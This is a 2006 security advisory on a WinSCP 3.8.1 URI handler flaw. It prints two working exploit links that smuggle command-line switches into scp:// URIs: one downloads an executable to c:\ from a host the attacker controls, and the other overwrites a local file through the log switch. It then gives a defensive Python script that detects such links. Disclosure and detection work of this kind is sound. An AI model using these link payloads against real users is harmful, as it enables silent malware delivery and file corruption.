[NT] WinSCP - URI Handler Spoofing
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 14 Jun 2006 14:08:06 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
WinSCP - URI Handler Spoofing
------------------------------------------------------------------------
SUMMARY
"WinSCP <http://winscp.net/> is an open source freeware SFTP client for
Windows using SSH."
Improper handling of a URI allows attackers to upload, download and
execute arbitrary files without user intervention.
DETAILS
Vulnerable Systems:
* WinSCP version 3.8.1
During a typical installation of WinSCP, several URI handlers are installed
(scp://, sftp://). It is possible to include additional command line
switches in the URI, which are then passed to WinSCP.
Some of these switches may initiate a file transfer, sending a specified
file to an arbitrary FTP server, or they may download executables to a
location on the PC where they would be executed, e.g. the startup folder.
Attackers can create an HTML page with the following content:
<a
href="scp://user:password@host:22/%22%20/console%20/command%20%22lcd%20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a>
When a user clicks on the link, it automatically downloads
malware.exe to c:\ (assuming the host is in the cache; otherwise user
interaction is required).
Clicking on
<a href="scp://jelmer@xxxxxxxxx:22/%22%20%22/log=c:%5csomefile%22">log</a>
would append log output to c:\somefile, possibly rendering the file
unusable in the process.
Note that this also works when the host is not in the cache.
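A defensive check for links of the kind shown above, as an added example that is not part of the original advisory or of WinSCP: it percent-decodes scp:// and sftp:// hrefs in a page and reports any whose decoded form closes the quoted URI argument and appends switches. It assumes the handler is registered in the form program "%1"; the function names, the sample page and host.example are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

HANDLER_SCHEMES = {"scp", "sftp"}  # handlers named in the advisory
# A switch-like token (/console, /log=...) at the start of an argument.
SWITCH_RE = re.compile(r'(?:^|[\s"])(/[A-Za-z]+)(?==|[\s"]|$)')

def audit_uri(uri):
    """Return findings for one URI; an empty list means nothing suspicious."""
    scheme, sep, _ = uri.partition("://")
    if not sep or scheme.lower() not in HANDLER_SCHEMES:
        return []
    decoded = unquote(uri)  # the string once every %XX has been decoded
    quote_at = decoded.find('"')
    if quote_at < 0:
        return []
    # Assumption: the handler command line is  program "%1". The first
    # decoded quote closes that argument; the tail becomes extra arguments.
    tail = decoded[quote_at + 1:]
    findings = ["decoded quote ends the quoted URI argument"]
    findings += ["injected switch " + s for s in SWITCH_RE.findall(tail)]
    return findings

class LinkAuditor(HTMLParser):
    """Collect (href, findings) for every flagged link in an HTML page."""
    def __init__(self):
        super().__init__()
        self.flagged = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            findings = audit_uri(value.strip()) if name == "href" and value else []
            if findings:
                self.flagged.append((value.strip(), findings))

def audit_html(html):
    auditor = LinkAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.flagged

# Constructed sample page: a benign link plus the advisory's first link.
SAMPLE = r'''<a href="sftp://user@host.example:22/home/user/report.txt">ok</a>
<a
href="scp://user:password@host:22/%22%20/console%20/command%20%22lcd%20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a>'''

if __name__ == "__main__":
    for href, findings in audit_html(SAMPLE):
        print(href, findings)
```
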
ADDITIONAL INFORMATION
The information has been provided by Jelmer Kuperus
<mailto:jkuperus@xxxxxxxxx>.
The original article can be found at:
<http://www.frsirt.com/english/reference/13286>